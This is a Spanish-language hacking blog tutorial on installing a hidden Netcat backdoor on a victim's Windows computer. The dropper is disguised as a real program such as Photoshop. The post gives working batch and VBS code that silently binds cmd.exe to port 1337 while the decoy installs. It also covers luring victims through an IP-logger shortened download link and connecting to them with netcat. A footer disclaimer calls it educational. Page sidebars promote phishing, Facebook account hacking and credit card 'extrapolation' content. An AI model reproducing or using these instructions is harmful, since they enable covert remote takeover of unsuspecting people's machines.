㊜Suscribete!!! Quieres seguir este blog? Participa en el sitio

Selecciona tu idioma

Install a Exploit Persistant Backdoor Using Netcat


Instale una puerta trasera persistente de explotación mediante Netcat
Netcat es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos). Fue originalmente desarrollada por Hobbit en 1996 y liberada bajo una licencia de software libre permisiva (no copyleft, similar a BSD, MIT) para UNIX. Posteriormente fue portada a Windows y Mac OS X entre otras plataformas. Existen muchos forks de esta herramienta que añaden características nuevas como GNU Netcat o Cryptcat. wikipedia

Entre sus múltiples aplicaciones, es frecuente la depuración de aplicaciones de red. También es utilizada a menudo para abrir puertas traseras en un sistema.
Exploit remoto. Si utiliza una red de comunicaciones para entrar en contacto con el sistema víctima. Por ejemplo puede usar otro equipo dentro de la misma red interna o tener acceso desde la propia Internet.
Netcat descargar para windows

Download nc111nt.zip (password:nc) - Netcat for Windows
Netcat descargar para linux

Netcat descargar para termux
pkg install git
pkg install sh
git clone https://github.com/Pericena/Exploits-Netcat.git
cd Exploits-Netcat
bash exploincat.sh
nc IP-de-la-victima 1337

Linea de comando

La línea básica de comandos para Netcat es nc [opciones] host puertos, donde host es la dirección IP que se desea analizar y puertos es o un  determinado puerto o un rango de puertos o una serie de puertos separados por espacios. Echemos un vistazo a cada una de las opciones.
-help
  • -d Permite que nc trabaje en forma silenciosa y se desenganche del indicador de comandos MS-DOS.
  • -e Un nc a la escucha podrá ejecutar el en el instante en que alguien se conecte al puerto en el que está escuchando.
  • -i Intervalo de espera, que es la cantidad de tiempo que nc esperará entre dos envíos de datos sucesivos.
  • -g Se pueden especificar hasta 8 opciones –g en la línea de comandos para forzar que su tráfico nc pase por determinadas direcciones IP.
  • -G Esta opción le permitirá definir que dirección IP va a ser el siguiente salto dentro de la ruta indicada con la opción –g.
  • -l Activa el modo escucha de nc.
  • -L Activa el modo escucha de nc pero con más interés.
  • -n Indica a nc que no realice ninguna consulta de nombres de hosts.
  • -o Realiza un volcado hexadecimal de los datos y los almacena en un archivo hexadecimal.
  • -p Le permite especificar el puerto local que va a utilizar nc.
  • -r Nc elegirá aleatoriamente los puertos locales y remotos.
  • -s Especifica la dirección IP de origen que deberá utilizar nc cuando efectue sus conexiones.
  • -t Es capaz de controlar la negociación de opciones Telnet.
  • -u Indica a nc que utilice UDP en lugar de TCP.
  • -v Informa el estado de nc, si pones otra –v podrás obtener más información.
  • -w Controla cuanto tiempo va a esperar nc antes de dar por terminada una conexión.
  • -z Le dice a nc que envíe la cantidad de datos necesarias para conocer en que puertos se está escuchando algo.
⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫
Ingeniería social 
lo que aremos es hacerle creer a nuestra victima que le pasaremos un programa "x" ejemplo :photoshop ,hack ,ultraiso,vpn, otros programas . Todos los archivos deben ser subido en un servidor de almacenamiento , para lograr nuestro objetivo debemos ponerlo en un acortado de link llamados iplogger   lo encontras en este link :) https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html 
enviar este link a la victima pero antes debemos acortar el link con iplogger https://www.mediafire.com/file/zc6z11ln09sv4ga/Programa.zip/file

Instalación victima
Una vez descarga los programas lo que ara el xploits sera instalar el programa real , pero mientras tanto se ejecutara el payloads en segundo plano abriendo un shell remota .
El comando que se ejecutara sera nc.exe -lvp 1337 -e cmd.exe
Código de payloads.exe
╔═══════ ≪ °❈° ≫ ═══════╗
@echo off
TITLE Remote
cls
cd programa
nc.exe -lvp 1337 -e cmd.exe
╚═══════ ≪ °❈° ≫ ═══════╝
payloads.exe nos permitirá abrir una puerta de enlace

Código de script.vbs
╔═══════ ≪ °❈° ≫ ═══════╗
Set WshShell=CreateObject("WScript.Shell")
WshShell.Run chr(34) & "payloads.exe" & Chr(34),0
Set WshShell=Nothing
 ╚═══════ ≪ °❈° ≫ ═══════╝
script.vbs nos permitira ejecutar el payloads en segundo plano

Código xploits.exe
╔═══════ ≪ °❈° ≫ ═══════╗
@echo off
TITLE install
cls
cd programa
start PSCS6.exe
start script.vbs
exit
 ╚═══════ ≪ °❈° ≫ ═══════╝
xploits.exe nos permitirá ejecutar el archivo vbs y exe

Observamos que nuestro expoits esta funcionando el programa photoshop funciona correctamente al igual que el script.vbs se ejecuta en segundo plano con el puerto 1337

Conexión atacante 
Para este ataque necesitamos la ip de la victima como sabemos el puerto que usaremos sera 1337 , al usar el link de acortadores link aquí (0.0)=" https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html " podemos también obtener la ip del visitante en este caso seria la victima

✎En windows ejecutamos el nc.exe para poder introducir los datos o usar en la shell nc -n -v ip 1337
 pero tenemos otra opción ejecutando xploitsnc.exe


✎En Linux introducimos en shell nc IP 1337 o ncat IP 1337 pero también tenemos otra opción usando un script en bash para poder ejecutar la tarea de conexión


✎En termux abrimos la app introducimos en nuestra terminal el comando  nc IP 1337 
De esa manera podemos tener acceso a un dispositivo 













☆・。。・゜゜・。。・゜★ 
https://www.mediafire.com/file/zc6z11ln09sv4ga/Programa.zip/file

█▌│▌║▌ │█│║││█│
   Siguenos en YouTube Siguenos en YouTube
Conviértete en el mayor hacker del mundo Descarga gratis la app The Seven Codes y comparte
Google play

ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. 
NO ES RESPONSABLE DE NINGÚN TIPO DE PROBLEMA ILEGAL. 
PERMANECE LEGAL. 
GRACIAS! 
Si tienes algún problema, deja un comentario y comparte tú opinión. 
¿Ha quedado contestada su pregunta? 


Comentarios


㊜Luishiño

★ ★ ★ ★ ★

>_

Hola soy ぎLuishiño y este es mi Blog personal..... 

Me considero un joven emprendedor,curioso,creativo,alegre y confiable,siempre buscando la manera de mejorar como amigo y persona . Estudio la carrera de ing. sistemas, aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación, desarrollo web, Aplicaciones, Software, programas que yo mismo las desarrollo y cosas básicas de informática.

⚠ Nadie es como tú y ese es tú súper poder
¯\(°_o)/¯ Sigue mi blog :3

↪Sígueme en las redes sociales↩

Si tienes algún dudas, deja un comentario ¿Ha quedado contestada su pregunta? Comparte tu opinión :)

¡Bienvenido!

a la web de seguridad de la información The Seven Codes. Estimado Visitante, Te doy la más cordial bienvenida Atte:ぎLuishiño. Esperamos que encuentre la información que tú busca y que como resultado, me vea favorecido con su elección y preferencia. En este blog podrás encontrar muchas cosas de su utilidad, desde herramientas, manuales,comandos, artículos, tutoriales todo el contenido es totalmente gratuito hazta consejos los cuales ayudaran a seguir ampliando su conocimiento & siga aumentando tú pasión por la informática. ❯❯Más información

¯\(°_o)/¯ Sígueme en mi blog

YouTube

"Ataque de fuerza bruta Este método se trata de prueba y error, donde el atacante, provisto con algún software automatizado, puede probar miles de combinaciones posibles de diferentes caracteres y longitudes para tratar de abrir la autenticación del usuario, hasta que da con la contraseña correcta."

Mira este video y sorprendete

Tu y Las Redes Sociales

Tu y Las Redes Sociales

Publicada por Servicio Técnico "The Seven Codes " en Martes, 5 de diciembre de 2019

"Es tiempo que te preguntes, si eres libre y si te gusta como ellos te obligan a vivir."


Entradas populares de este blog

Doxing Espionaje y Recopilación de Información

Hackear contraseñas WiFi con Python fácilmente con este sencillo script

Droid Jack control sobre los dispositivos Android

USBDeview permite administrar todos los dispositivos USB conectados al ordenador

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Termux Instalar Ngrok

Diskdigger recuperar archivos eliminados o formateados de una usb o un android

Ataque de fuerza bruta para facebook con fb

Método de extrapolación Sofia para tarjetas de crédito

Análisis falsificación o alteración de una fotografía

Entradas populares de este blog

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Vulnerabilidad en facebook hackear con xploitz parte II

Sockberus Autentificación de proxys

¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte I

Programa Revealer Keylogger Pro

By Blog

By Luishiño

Security Hacking

Especialista en seguridad informática

Ofertas y Descuentos

Libros

by @Luishiño! Publicado en enero 14, 2020

Curso Javascript Hacking | Phishing

Javascript es un lenguaje que se puede utilizar para hacer ataques xss , robo de cookies , keylogger web y muchas otras cosas mas , pero también se puede con este mismo lenguaje evadir esas vulnerabilidades .

$1

Libros

by @Luishiño! Publicado en enero 25, 2020

Hacking Course Social Networks

Los “Xploits” consisten en que la víctima recibe una postal falsa en su correo electrónico que contiene el link de una web falsa que le pide digitar los datos de su E-mail y su contraseña .

$5



Únete al chat